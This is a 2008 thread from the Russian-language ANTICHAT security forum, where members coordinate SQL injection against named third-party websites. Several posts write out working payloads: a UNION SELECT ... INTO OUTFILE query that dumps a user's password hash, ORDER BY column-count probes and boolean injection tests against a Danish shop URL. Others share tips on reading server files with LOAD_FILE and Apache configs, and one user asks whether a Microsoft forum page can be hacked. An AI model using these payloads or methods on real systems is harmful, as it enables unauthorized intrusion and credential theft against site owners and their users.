HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4031  
Старый 06.12.2008, 00:13
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от desTiny  
InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
https://forum.antichat.ru/showthread.php?t=49775
 

  #4032  
Старый 06.12.2008, 00:15
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

https://forum.antichat.ru/thread79411.html
 

  #4033  
Старый 06.12.2008, 00:32
AHMED HASSAN
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445

Репутация: 1
По умолчанию

hi

sorry for english

is this hackable

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

waitting>>>>>>>>>>>
 

  #4034  
Старый 06.12.2008, 00:38
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!

-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!

Последний раз редактировалось BanQui; 06.12.2008 в 00:44..
 

  #4035  
Старый 06.12.2008, 02:00
InvisibleSM
Новичок
Регистрация: 03.12.2008
Сообщений: 8
Провел на форуме:
41669

Репутация: 1
По умолчанию

блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

во что пишу

' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

а прочитать терь как, хз

на ошибки гуглил, нету

Последний раз редактировалось InvisibleSM; 06.12.2008 в 02:06..
 

  #4036  
Старый 06.12.2008, 03:00
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

[QUOTE=DimOnOID]а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
/QUOTE]

У мя конфиги не читались на фряшке =_=,точнее,на двух.Пад рутом...
 

  #4037  
Старый 06.12.2008, 06:11
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?
 

  #4038  
Старый 06.12.2008, 07:11
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
 

  #4039  
Старый 06.12.2008, 07:21
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от o3,14um  
http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..

Последний раз редактировалось 159932; 06.12.2008 в 07:24..
 

  #4040  
Старый 06.12.2008, 07:46
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от o3,14um  
http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
ну тогда зайди и посмотри вывод
Цитата:
http://www.viper-shop.dk/category.php?id=180+and+1=1
и
Цитата:
http://www.viper-shop.dk/category.php?id=180+and+1=0
отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ